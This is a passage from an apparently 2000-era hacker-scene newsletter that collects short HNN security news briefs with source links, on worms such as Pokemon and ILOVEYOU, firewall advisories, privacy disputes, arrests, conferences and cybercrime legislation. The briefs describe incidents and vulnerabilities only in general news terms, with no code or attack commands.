      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Publisher Steven Brill, who wants to hire Kevin Mitnick as a
      columnist, has retained the services of esteemed New York attorney
      Floyd Abrams. Abrams will file a friend of the court brief to assist
      Kevin in his fight to lift the bail restrictions placed on him to
      prevent him from speaking his mind and earning a living.
      
      C|Net
      
      http://news.cnet.com/news/0-1005-200-1951220.html?tag
      @HWA
      
      
 98.0 [HNN] May 30'00 Black Hat Posts Speaker Lists, Adds Old Video Clips 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Dark Tangent 
      The Blackhat web site has added video on-line from past shows,
      including an excellent key-note speech from Marcus Ranum on how to
      "really" secure the Internet, a must see. Presentations from BH Asia
      are available as well, with video added shortly. At BH US this year
      there will be new security vulnerabilities discussed including
      transitioning from ring 3 to ring 0 in Windows NT (Breaking their
      security model), tricks to defeating parts of Firewall-1, and Mudge
      will talk in depth on passive detection techniques for locating
      sniffers, based on his work with Anti-sniff.
      
      Blackhat
      
      http://www.blackhat.com
      @HWA
      
  99.0 [IND] Pokemon virus hits U.S. targeting kids
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      Cuddly Pokemon Virus Targets Kids
      By Richard Meares, Reuters
      August 24, 2000

      Children everywhere beware -- Pikachu is not as cuddly as he seems.
      
      The Pokemon character has mutated into a nasty little virus, spreading via 
      email like the devastating "Love Bug" did. 
      
      Virus experts said Thursday that the cute yellow rabbit-like creature, a
      darling of the Pokemon videogame family, is appearing in the United States
      as a computer virus, wrecking PCs by wiping out their system files.

      'These computers may take you into cyberspace, but they are also running
      the world.' -- Eric Chien, Symantec

      So far "Pokey" has sown only a fraction of the havoc its famous 
      predecessor did, but he's giving both computer experts and parents cause 
      for concern. Kids, not corporations, are the target of the cybervandals 
      this time. 
            
      "We haven't seen viruses or worms targeted at children before," said Eric 
      Chien, chief researcher at antivirus company Symantec's Dutch laboratory. 
            
      "This is the first one." 
      
      "Since it comes as a little Pokemon animation, 10-year-olds are likely to 
      be more interested in double-clicking on it." 
      
      Viruses infect a computer and cause damage, but rely on users to 
      unwittingly spread them from one computer to another. Worms find their own 
      way to spread, usually on the Web. 
      
      This worm appears as an email with the title "Pikachu Pokemon" and the 
      message "Pikachu is your friend." 
      
      Japanese antivirus firm Trend Micro advises anyone who receives the email 
      to delete the file without opening it. 
      
      Pokey bites less but bites harder 
      
      Earlier this year, the Love Bug raced around the world and caused damage 
      estimated from hundreds of millions to billions of dollars. Many major 
      corporations were forced to shut down their internal communications to 
      stamp it out. 
      
      It came as an email entitled "ILOVEYOU" with an attachment that, if 
      opened, infected the computer and emailed itself to everyone in the user's 
      Microsoft Outlook address book. 
      
      Pokey, aimed at children hooked on the worldwide Pokemon craze, has spread 
      more slowly and has not gone as far, giving antivirus software companies 
      like Symantec, Trend Micro, and Britain's Sophos time to mount a defense. 
      
      But once Pokey gets into your computer, its bite is far more deadly than 
      the Love Bug's. 
      
      It destroys all files in the Windows and System directories. The Microsoft 
      operating system, used by four-fifths of the world's computers, must be 
      reinstalled from scratch. 
      
      The Love Bug's most prevalent versions attacked data files such as 
      pictures, but left the whole system intact. 
      
      People want to be liked -- that's their weakness 
      
      With 50,000 worms wriggling around cyberspace, Chien said the key to an 
      effective one is to appeal to human emotions. "Love Bug was not really new 
      but the reason it hit so many people was social engineering. These things 
      require people to double-click on them to run them. And who doesn't like 
      to receive a love letter?" 
      
      Nintendo, the videogame company that owns the copyright to the wildly
      popular Pokemon -- or "pocket monster" -- characters, was unavailable for
      comment.
      
      Trend Micro said that, surprisingly, the worm had not surfaced in Japan 
      yet. Europe also seems to be little affected so far. 

      Ironically, the Love Bug and the earlier Melissa virus may have helped
      computer users defend themselves against viruses. They attracted so much
      attention that many users now know they should treat unsolicited email
      attachments with suspicion. Pokey, however, targets a group of users who
      are not virus-savvy -- young children.
      
      Chien warned that as the mobile Internet grows, so will the risk of new 
      viruses that target cell phones and online pocket organizers. So far, 
      however, these devices have only suffered text-message (SMS) bombardments. 
      
      Chien advised people to practice safe surfing -- since suspect websites
      could also contain viruses -- and to preach it to children. He said people
      should stop thinking of computers as some kind of link to a virtual world 
      where real damage could not be done. 
      
      "These computers may take you into cyberspace -- but they are also running
      the world," he warned. 


      Copyright (c) 2000 Reuters Limited. Limitations and Restrictions on Use

      @HWA
      

 100.0 [HNN] May 31'00 Canada To Dismantle Big Bro Database 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by freedom 
      Human Resources Minister Jane Stewart has relented to public pressure
      and has announced that the massive database containing information on
      nearly every Canadian is to be dismantled. The Longitudinal Labor
      Force File has already severed links with databases at the Revenue
      Department and other agencies. She said she will also be recommending
      legal protections for the information used in her department. Some
      experts doubt that the government will simply delete the data.
      
      Globe and Mail
      Ottawa Citizen
      Wired
      Newsbytes
      Canoe.com
      
      http://www.globeandmail.ca/gam/National/20000530/UBIGGN.html
      http://www.ottawacitizen.com/national/000530/4185962.html
      http://wired.com/news/politics/0,1283,36649,00.html
      http://www.newsbytes.com/pubNews/00/149805.html
      http://ads.canoe.ca/CNEWSTopNews/bigbro_may30.html
      @HWA
      
      
 101.0 [HNN] May 31'00 Resume Causes Little Damage 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Evil Wench 
      The much hyped 'Killer Resume' worm died a quiet death over the
      weekend causing very little damage. It was feared that the Melissa
      variant would spread extremely fast on Tuesday morning when people
      came into work after the long holiday weekend.
      
      TechWeb
      Associated Press - via Nando Times
      
      http://www.techweb.com/wire/story/TWB20000530S0012
      http://www.nandotimes.com/technology/story/body/0,1634,500210254-500294870-501612274-0,00.html
      @HWA
      
      
 102.0 [HNN] May 31'00 Hong Kong Pirate Piracy Troubles 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by acopalyse 
      More than half of all software used in Hong Kong is pirated, the BSA
      reports. Losses from software piracy exceeded $12 billion worldwide
      in 1999 and topped $59 billion over the last five years, according
      to the BSA-commissioned survey.
      
      CNN
      
      http://www.cnn.com/2000/ASIANOW/east/05/29/hk.piracy.reut/index.html
      @HWA
      
      
 103.0 [HNN] May 31'00 New Zealand Man Claims Virus Info Stolen 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by William Knowles 
      A New Zealand man claims that he has stumbled onto the biggest hole in
      MS Outlook yet. The hole would allow malicious Java code to be
      executed on a Windows/Outlook machine without any user intervention.
      He said that soon after he contacted Microsoft the information was
      stolen off his computer by someone who broke into it. Microsoft says
      that they never received his initial communication and after reviewing
      his information claim that there is no security breach involved.
      
      The New Zealand Herald
      
      http://www.herald.co.nz/storydisplay.cfm?storyID
      @HWA
      
      
 104.0 [HNN] May 31'00 Bank Manager Executed 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by root66 
      After manipulating computer records to divert money into his own
      accounts, Shen Weibiao, the former bank manager of a Bank of China
      branch in Shaoguan city, was executed after the Supreme People's Court
      rejected his appeal. While the means of his execution was not released,
      most mainland China executions are done by gunshot.
      
      South China Morning Post
      
      http://www.scmp.com/News/China/Article/FullText_asp_ArticleID-20000530131544704.asp
      @HWA
      
      
 105.0 [HNN] May 31'00 Malaysian ISP Suffers Human Error Security Breach 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by dhillon 
      Mimos Berhad, a government funded research corporation and ISP, has
      admitted that an employee accidentally placed a large number of
      confidential files on a publicly accessible web server.
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/149718.html
      @HWA
      
      
 106.0 [HNN] May 31'00 Defcon Updates Web Site 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Dark Tangent 
      Defcon has updated its site with a more complete list of speakers and
      DJs for this year's convention in Las Vegas. Some lost video from DC 2
      and DC 6 has been found and put on-line! What did Artimage look like
      six years ago? Now the truth can be seen! Bonus: The writer of "Enemy
      of the State" will be screening a copy of the movie on the roof, and
      take Q&A after. Can't make it this year? There will be streaming media
      of the talks and DJs available.
      
      Defcon 8
      
      http://www.defcon.org
      @HWA
      
      
 107.0 [HNN] May 31'00 SWAT Hits Issue 29 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by The Firestarter 
      The UK's longest running underground e-zine, SWAT, has just released
      its 29th issue on their web site.
      
      Swateam
      
      http://www.swateam.org
      @HWA
      
 
 108.0 [HNN] June 01'00 Pennsylvania Passes Anti-Virus Law 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by acopalyse 
      It is now a crime to spread computer viruses in Pennsylvania.
      Legislation signed last week will carry a seven year jail sentence
      including damage reimbursement for those found guilty.
      
      Newsbytes - via Yahoo
      
      http://asia.dailynews.yahoo.com/headlines/technology/article.html?s
      @HWA
      
      
 109.0 [HNN] June 01'00 MLB Practices Security Through Obscurity 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
      contributed by Evil Wench 
      Determined not to have a repeat of last year, Major League Baseball has
      initiated an email address verification scheme during its All-Star
      balloting. Last year the ballot box for Boston Red Sox shortstop
      Nomar Garciaparra was fraudulently stuffed with 39,000 extra ballots.
      This year all email addresses will be verified and audited by a secret
      system. "There are a few folks out there we'd just assume not know
      what we're doing," said Tim O'Mara, senior vice president of
      operations for Bellevue, Wash.-based SeasonTicket.com Inc., which is
      in charge of this year's electronic tabulations. (Failing to make the
      procedure public invites suspicion on the integrity of the overall
      process as well as inviting people who are looking for a challenge.)
      
      Computer World
      
      http://www.computerworld.com/home/print.nsf/all/000526E3A2
      @HWA
      
      
 110.0 [HNN] June 01'00 Pr0n Detection Software 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      Software that scans photos for flesh tones and curves to detect nudity
      is being beta tested by Oklahoma based company Heartsoft Inc.
      Heartsoft has applied for a patent for this technology. It will be
      used in conjunction with the company's Internet Safari browser for
      children. (I can think of a few other good uses as well.)
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/149866.html
      @HWA
      
      
 111.0 [HNN] June 01'00 Fighting the Privacy Bootleggers 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by root66 
      The Gramm-Leach-Bliley Act has made it extremely easy for banks,
      insurance companies, and investment corporations to compile, share and
      sell information about you. Prohibited from doing so during the Great
      Depression, these companies are now able to cross reference their
      databases and come up with all sorts of information about you. Yes,
      there are ways to Opt-Out but they are difficult and arcane.
      
      PC World - via CNN
      
      http://www.cnn.com/2000/TECH/computing/05/31/privacy.law.idg/index.html
      @HWA
      
      
 112.0 [HNN] June 01'00 Marcia Clark Calls Hackers "Undersocialized Schizoids" 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Commodore Sloat 
      Well-dressed former prosecuting attorney Marcia Clark (yeah yeah, from
      the OJ trial) has a column on APB News where she lambastes hackers as
      pathological misfits "of barely average intelligence." As is typical
      of such columns, "hackers" are lumped together with any criminal with
      a computer.
      
      APB News
      
      http://apbnews.com/newscenter/clark/2000/05/31/clark0531_01.html
      @HWA
      
      
 113.0 [HNN] June 01'00 Fake Census Takers on the Prowl 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Evil Wench 
      In an effort to scam people out of their Social Security and Bank
      Account numbers people posing as fake Census takers are calling on
      households. There have been scattered reports of impostors in
      Arkansas, North Dakota, and northeastern Pennsylvania. The con artists
      seem to be targeting elderly people.
      
      Associated Press - via Yahoo
      
      http://dailynews.yahoo.com/h/ap/20000601/pl/census_scams_1.html
      @HWA
 
 
 114.0 [HNN] June 02'00 Top Ten Internet Security Problems 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      contributed by Marc 
      The SANS Institute has issued a report detailing the top ten security
      issues facing the Internet today. They include weaknesses in BIND,
      CGIs, RPCs, RDS, Sendmail, Global Filesharing, Weak User IDs and
      passwords, IMAP and POP buffer overflows, and SNMP community strings
      set to 'public'. The report describes each problem, lists CVE entries
      and offers advice on how to correct the issue.
      
      SANS
      PC World
      Federal Computer Week
      
      http://www.sans.org/topten.htm
      http://www.pcworld.com/pcwtoday/article/0,1510,17005,00.html
      http://www.fcw.com/fcw/articles/2000/0529/web-topten-06-02-00.asp
      @HWA
      
      
 115.0 [HNN] June 02'00 MPAA Attempts to Bar Press From Hearings 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Macki 
      Lawyers for the Motion Picture Association of America have asked the
      court to seal the upcoming hearings involving 2600 and to keep court
      records private. MPAA feels that releasing the names of its employees
      involved in anti-piracy efforts would place them in harm's way. They are
      also concerned about releasing information regarding their anti-piracy
      operations.
      
      2600
      Court Brief
      
      http://www.2600.com/news/2000/0601.html
      http://www.2600.com/dvd/docs/2000/0531-mpo.html#kaj
      @HWA
      
      
 116.0 [HNN] June 02'00 Anti-Virus Vendors Blame Media for Virus Hype 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      Anti-Virus vendors are calling for an established unified grading
      system to categorize viruses to prevent the media from getting into a
      feeding frenzy and spreading hype and misinformation (aka FUD). They
      cite the recent 'resume' scare as an example.
      
      Silicon.com
      
      http://www.silicon.com/a37811
      @HWA
      
      
 117.0 [HNN] June 02'00 Summercon 2000 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Summercon 2000, presented by r00t, Phrack Magazine, FEH, & 9mm, will
      be held this weekend on June 2nd through the 4th. The conference will
      be at the Omni Hotel @ CNN Center in Atlanta, GA. Summercon is the
      longest continuously run con still in existence.
      
      Summercon
      
      http://www.summercon.org/
      @HWA
      
      
 118.0 [HNN] June 02'00 India's First Cyber Criminal Arrested 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by no0ne 
      A 24 year old computer engineer has been arrested by the Indian Police
      for stealing over 100 hours of internet time. After being called to
      activate the account of a retired army officer, the service engineer
      changed the password of the account and later accessed it from 10
      different locations.
      
      BBC
      
      http://news.bbc.co.uk/hi/english/world/south_asia/newsid_773000/773025.stm
      @HWA
      
      
 119.0 [HNN] June 02'00 Libnet for NT Now Available 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Marc 
      eEye Digital Security has released LibnetNT as an open source project
      to help speed development. LibnetNT is similar to the popular Unix
      Libnet which is used to implement low level packet functionality into
      a program. LibnetNT has the exact same functionality and abilities as
      Libnet except LibnetNT can be used to develop low level packet
      injection programs on Windows NT4.0 and Windows NT5.
      
      eEye Digital Security
      
      http://www.eeye.com/html/Databases/Software/libnetnt.html
      @HWA
      

 120.0 [HNN] June 05'00 FW-1 Vulnerable to Fragmented Packets 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by Lance 
      An advisory posted to BugTraq this morning indicated that every
      Firewall-1 installation may be susceptible to a DoS attack from
      incomplete or illegal packet fragments. Since FW-1 waits until it has
      a complete packet before it inspects or logs the information, filter
      rules will not help. Checkpoint has reportedly developed a short term
      solution (We could not find it on their web site this morning) and are
      working on a long term fix to be rolled out in a later service pack.
      
      BugTraq - via Security Focus
      Checkpoint
      
      http://www.securityfocus.com/templates/archive.pike?list
      http://www.checkpoint.com
      @HWA
      
      
 121.0 [HNN] June 05'00 Australian Tax Office Sells Private Info 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by tall.drink 
      Privacy Commissioner, Mr Malcolm Crompton, has stated that the
      Australian Taxation Office had broken privacy laws by releasing
      personal information supplied by individual applicants for an
      Australian Business Number. The ABN application form states that the
      name, address, e-mail address, phone number, etc of applicants will
      remain 'confidential'. It does not say that anyone can purchase this
      information for $20, a clear violation of Australia's Privacy Act. The
      Tax Office will develop guidelines to prevent this from occurring in
      the future. (I guess we can all rest easy now.)
      
      Sydney Morning Herald
      
      http://www.smh.com.au/news/0006/06/national/national5.html
      @HWA
      
      
      
 122.0 [HNN] June 05'00 British Have Lost Dozens of Laptops 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by William Knowles 
      Britain's Ministry of Defense has revealed that since May of 1997 it
      has had 59 laptops stolen and 8 'lost' by staff members. The numbers
      were revealed in a written explanation to the House of Commons
      yesterday. (How do you lose a laptop?)
      
      Associated Press - via Nando Times
      
      http://www.techserver.com/noframes/story/0,2294,500212323-500298954-501646000-0,00.html
      @HWA
      
      
 123.0 [HNN] June 05'00 S.2448 Analysis 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      An analysis of S.2448, the Internet Integrity and Critical
      Infrastructure Protection Act of 2000, has been posted to Cipherwar.
      The analysis looks at each provision of the bill and what it means.
      The bill was introduced in April and has been referred to the
      Committee on the Judiciary.
      
      Cipherwar
      S.2448 - Senate.gov
      
      http://cipherwar.com/news/00/s2448_hacking.htm
      http://rs9.loc.gov/cgi-bin/query/D?c106:3:./temp/~c10690I7Wg::
      @HWA
      
      
 124.0 [HNN] June 05'00 Spammer Busted For Online Tampering 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Code Kid
      Jason Garon, 46, of Mission Viejo, CA., has been arraigned on charges
      of forgery and computer tampering after using the computer systems of
      Max Vision, a New York state company, to send millions of email
      advertisements for porn sites. If convicted he could be sentenced to
      up to seven years in prison. The District Attorney said that this is
      the first case involving online forgery in the country.
      
      Associated Press - via C|Net
      
      http://news.cnet.com/news/0-1005-200-2024887.html?tag
      @HWA
      
      
 125.0 [HNN] June 05'00 Cell Phone Viruses? 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Next generation cell phones that include programmability and internet
      access may become susceptible to new forms of viruses. These new
      viruses may reroute phone calls, record conversations, rack up huge
      phone bills, as well as delete data and cause general mayhem. (In
      reality this isn't all that far fetched but this article is just full
      of FUD.)
      
      Fox News
      
      http://www.foxnews.com/vtech/060100/cellvirus.sml
      @HWA
      

 126.0 [HNN] June 07'00 SPAM Worm Hits Cell Phones In Spain 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Lady Sharrow 
      Users of the Spanish cell phone company Telefonica are being hit by
      the Timofonica Worm. While Timofonica does not infect cell phones
      directly it does send annoying email messages to users. The worm is
      spread through conventional email and includes a rant against the
      state owned Telefonica monopoly. When users open the .vbs attachment
      it sends an email to an email-GSM gateway with a random user ID where
      the message is then sent to cell phones.
      
      The Register UK
      ZD Net
      MSNBC
      Internet News
      Reuters - via Yahoo
      Associated Press - via Nando Times
      
      http://www.theregister.co.uk
      http://www.zdnet.com/zdnn/stories/news/0,4586,2583104,00.html
      http://www.msnbc.com/news/417066.asp?cp1
      http://www.internetnews.com/intl-news/article/0,2171,6_388331,00.html
      http://dailynews.yahoo.com/h/nm/20000606/tc/virus_phone_dc_1.html
      http://www.nandotimes.com/technology/story/body/0,1634,500212951-500300231-501656210-0,00.html
      @HWA
      
      
 127.0 [HNN] June 07'00 MafiaBoy to Get New Charges 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Mafiaboy was arrested for DDoS attacks on high-profile Internet sites
      back in February but has only been charged with the attack on CNN.
      Canada's crown prosecutor Louis Miville-Deschenes will now bring
      additional charges of the same type but for attacks against different
      sites.
      
      Agence France Press - via Nando Times
      
      http://www.nandotimes.com/technology/story/0,1643,500212784-500299842-501653573-0,00.html
      @HWA
      
      
 128.0 [HNN] June 07'00 CheckPoint Posts Temp Fix for FW-1 Vulnerability 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Boyd 
      Checkpoint has posted an interim work around for the IP
      Fragment-driven denial of service attack announced yesterday. The work
      around involves a command line instruction that will disable console
      logging.
      
      Checkpoint FW-1 Fix
      BugTraq - original advisory
      
      http://www.checkpoint.com/techsupport/alerts/ipfrag_dos.html
      http://www.securityfocus.com/templates/archive.pike?list
      @HWA
      
      
 129.0 [HNN] June 07'00 Air Force Blocks Access to Museum Web Site 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne
      Soldiers of Peterson Air Force Base in Colorado are not allowed to
      access the web site of San Francisco based Science museum
      Exploratorium. The reason, according to museum officials, is that they
      have the recipe for "bubble bomb" up on their site. Bubble bomb is an
      experiment in which vinegar and baking soda are mixed in a plastic
      bag, a chemical reaction takes place, in turn causing the bag to
      explode. (Kids in grade schools do this for science class, right?)
      
      Associated Press- via San Jose Mercury News
      
      http://www.mercurycenter.com/breaking/docs/016603.htm
      @HWA
      
      
 130.0 [HNN] June 07'00 Mounties Fall Behind Crooks in Online Crime 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Brian 
      Years of deep budget cuts have left the Canadian Mounties far behind
      the criminals when dealing with online crime. Officials hope that the
      recent approval of $543-million in new funds will help narrow that
      gap. The RCMP has lost several good officers to the private sector
      recently but hopes to train 1,200 to 1,300 new Mounties this year.
      
      National Post
      
      http://www.nationalpost.com/financialpost.asp?f
      @HWA
      

 131.0 [HNN] June 08'00 Accused in ILOVEYOU virus case set free 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by weld pond 
      The 27 year old bank employee, Reonel Ramones, suspected in the "Love
      Bug" virus case has been freed because there is no law in the
      Philippines under which he could be prosecuted. He did nothing
      illegal.
      
      CNN
      San Jose Mercury News
      http://cnnfn.com/2000/06/07/worldbiz/wires/love_wg/
      http://www.mercurycenter.com/svtech/news/breaking/merc/docs/020797.htm
      @HWA
      
        
 132.0 [HNN] June 08'00 Kevin Mitnick Talks About Jobs in Computer Security 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by silicosis 
      Kevin Mitnick and a range of people from the computer underground are
      interviewed about working in the computer security industry.
      
      CIO Magazine
      
      http://www.cio.com/archive/060100_con.html
      @HWA
      

 133.0 [HNN] June 08'00 Australia passes law legalizing government computer intrusions 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by apocolypse
      The Telecommunications (Interception) Legislation Amendment Bill 1999
      was passed through Australian Parliament. The new bill aims to aid law
      enforcement officers investigating criminal activities and
      intelligence collection by the Australian Security Intelligence
      Organization. This latest bill adds to legislation passed last year
      that gave ASIO, Australia's internal security service, the right to
      hack into any Australian's computer.
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/150247.html
      @HWA
      
    
 134.0 [HNN] June 08'00 Press allowed to cover MPAA depositions 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by apocolype 
      The Motion Picture Association of America (MPAA) loses its bid to stop
      public scrutiny of proceedings in a lawsuit targeting an online
      distributor of freely available DVD-cracking technology. Yesterday's
      ruling marked a victory for freedom of expression and society's access
      to its courts, Robin Gross, an attorney with the Electronic Frontier
      Foundation (EFF), said today. The San Francisco-based civil liberties
      group is backing the defense of 2600 Magazine and is representing
      defendants in a similar case in California.
      
      Newsbytes
      Ruling via Cryptome
      2600
      
      http://www.newsbytes.com/pubNews/00/150243.html
      http://cryptome.org/mpaa-v-2600-spo.htm
      http://www.2600.com/news/2000/0608.html
      @HWA
      
    
    
 135.0 [HNN] June 08'00 Vulnerability in free mail services found 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by apocolype 
      Lycos' WhoWhere fixes a problem affecting millions of email accounts
      that allowed intruders to peruse email and send messages as though
      accounts were their own. Lycos would not say how many people have
      registered for the company's MailCity service, nor would they estimate
      how many other accounts may have been at risk or how long the bug
      might have existed.
      
      CNET
      http://news.cnet.com/news/0-1005-200-2036086.html?tag
      @HWA
      
        
 136.0 [HNN] June 08'00 OnStar service can unlock car doors 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime 
      The OnStar system allows OnStar to call into your car and control your
      door locks, the horn, and the lights. Very secure and very proprietary
      systems protect your OnStar system from being abused by attackers.
      
      Risk Digest
      http://catless.ncl.ac.uk/Risks/20.90.html#subj2
      @HWA
      

 137.0 [HNN] June 09'00 Thousands of trojaned computers found 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by weld pond 
      The Justice Department has been notified that thousands of computers
      have been found with trojan remote control software installed. A file
      which looked like a movie clip actually contained remote control
      software which has been dubbed the "Serbian Badman Trojan".
      
      AP
      
      http://news.excite.com/news/ap/000609/02/hacker-attack
      @HWA
      
      
 138.0 [HNN] June 09'00 Investigative Report: Female Hackers 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by weld pond
      ABC News investigates the female side of the hacker subculture. This
      largely male dominated world presents special challenges to women.
      Scene whores, hacker hangouts, and the non-sexist elite are covered.
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/hackerwomen000609.html
      @HWA
      
      
 139.0 [HNN] June 09'00 ISS founder is a white hat hacker 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      LinuxWorld profiles Christopher Klaus, the founder of ISS. The origins
      of his company and products are discussed as well as their current
      classes in Linux security.
      
      LinuxWorld
      
      http://www.linuxworld.com/linuxworld/lw-2000-06/f_lw-06-iss.html
      @HWA
      
      
 140.0 [HNN] June 09'00 80,000 DNS Domain Server Vulnerable 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse
      80,000 domains make up about 75 percent of the domain name system
      (DNS) in Australia and New Zealand. These DNS servers are vulnerable
      to Denial-of-Service attacks, and 55 percent may be compromised at the
      root level. One security threat for vulnerable DNS systems is that a
      hijacker could point a site's DNS to a proxy server, capture important
      information, then send data back to the genuine server with the
      interception unnoticed.
      
      ZDNET
      
      http://www.zdnet.com.au/enterprise/security/stories/au0003277.html
      @HWA
      
      
 141.0 [HNN] June 09'00 Lewis Koch on Winn Schwartau 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by mcintyre
      Lewis Koch has an opinion piece about Winn Schwartau. This quote says
      it all: "It's not that hackers present no real danger. In fact, we
      need a sober analyst of Internet reality, someone who can identify who
      is doing real damage and how that damage can legitimately be monitored
      and contained. But Schwartau, peddling his Cybershock warning of a
      virtual doomsday, is just another hysterical infowarrior playing to
      our primal burrowing instincts."
      
      Interactive Week
      
      http://www.zdnet.com/intweek/stories/columns/0,4164,2584807,00.html
      @HWA
      
      
 142.0 [HNN] June 09'00 Television takes on computer crime 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by PhantasmP and Weld Pond 
      There are 2 upcoming shows on TV relating to computer security. The
      first is on A&E Networks' respected Investigative Reports. The show is
      titled "e-terror" and airs Wed, June 14 at 10pm. The show will be an
      in-depth look at security on the internet. People from NIPC, the
      military, and the L0pht will be interviewed.
      
      Investigative Reports
      
      This Saturday (May 13th) America's Most Wanted is airing an episode
      about cyber terrorism. The write up in the print edition of TV Guide
      is as follows: "Examining U.S. government efforts to stop criminal
      computer hackers, who can disrupt vital city services." The online
      edition says "Cyber-Criminals Special Edition: An overview of cyber
      terrorism includes easy targets; wide-ranging effects; and a profile
      of a dangerous hacker." The show is scheduled to air at 9pm EST on FOX
      Networks.
      
      America's Most Wanted
      
      http://www.aande.com/tv/shows/billkurtis/irhighlights.html#e-terror
      http://www.amw.com/
      @HWA
      
      
 143.0 [HNN] June 09'00 Top 50 Security Tools Survey 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by weld pond 
      1200 nmap users were surveyed about their favorite security tools.
      Open source tools ruled the day. The survey includes descriptions and
      pointers to the distribution sites.
